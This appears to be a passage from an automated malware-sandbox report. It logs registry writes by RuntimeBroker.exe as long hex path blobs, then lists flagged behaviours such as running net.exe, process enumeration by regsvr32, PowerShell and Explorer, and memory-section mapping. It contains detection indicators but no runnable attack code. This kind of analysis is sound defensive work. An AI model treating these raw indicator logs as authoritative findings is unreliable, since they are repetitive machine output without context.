0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e837547b2ca7d801543bc2802ca7d801543bc2802ca7d8016d601a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000653435366630633931306366316530336637336363643337346662336231336432353233613534613463313762666663646235323666396234643265333035340000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000aa7c7800650034003500360066003000630039003100300063006600310065003000330066003700330063006300640033003700340066006200330062003100330064003200350032003300610035003400610034006300310037006200660066006300640062003500320036006600390062003400640032006500330030003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65343536663063393130636631653033663733636364333734666233623133643235323361353461346331376266666364623532366639623464326533303534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ae1548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ae1548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = e868d9802ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\269dfa06-9572-4768- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = 52fe557f2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = d2325f802ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = d8acf77a2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000007ac7007b2ca7d8017ac7007b2ca7d8017ac7007b2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000633033633862643362353930386636633864666665613338663336336437346338656535653230316339616666353437383235366338616139303533666365340000b20009000400efbe0355d95b0355d95b2e0000000000000000000000000000000000000000000000000086098200630030003300630038006200640033006200350039003000380066003600630038006400660066006500610033003800660033003600330064003700340063003800650065003500650032003000310063003900610066006600350034003700380032003500360063003800610061003900300035003300660063006500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63303363386264336235393038663663386466666561333866333633643734633865653565323031633961666635343738323536633861613930353366636534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad8548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad8548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d6f0077b2ca7d801d6f0077b2ca7d801d6f0077b2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000656532653161376439643366363033636132323164316238343932373330653936363833343361653038656539636463613335663638626138323661336538350000b20009000400efbe0355d95b0355d95b2e000000000000000000000000000000000000000000000000002ae07a00650065003200650031006100370064003900640033006600360030003300630061003200320031006400310062003800340039003200370033003000650039003600360038003300340033006100650030003800650065003900630064006300610033003500660036003800620061003800320036006100330065003800350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65653265316137643964336636303363613232316431623834393237333065393636383334336165303865653963646361333566363862613832366133653835000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad9548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad9548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = 3937117b2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee2e1a7d9d3f603ca221d1b8492730e9668343ae08ee9cdca35f68ba826a3e85" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e456f0c910cf1e03f73ccd374fb3b13d2523a54a4c17bffcdb526f9b4d2e3054" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = 94fb917a2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006bfe317c2ca7d8018c80847d2ca7d8018c80847d2ca7d80140f91a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000633033633862643362353930386636633864666665613338663336336437346338656535653230316339616666353437383235366338616139303533666365340000b20009000400efbe0355d95b0355d95b2e0000000000000000000000000000000000000000000000000086098200630030003300630038006200640033006200350039003000380066003600630038006400660066006500610033003800660033003600330064003700340063003800650065003500650032003000310063003900610066006600350034003700380032003500360063003800610061003900300035003300660063006500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63303363386264336235393038663663386466666561333866333633643734633865653565323031633961666635343738323536633861613930353366636534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157add548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157add548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e456f0c910cf1e03f73ccd374fb3b13d2523a54a4c17bffcdb526f9b4d2e3054" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6bc68a4b-b0ee-4f30- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

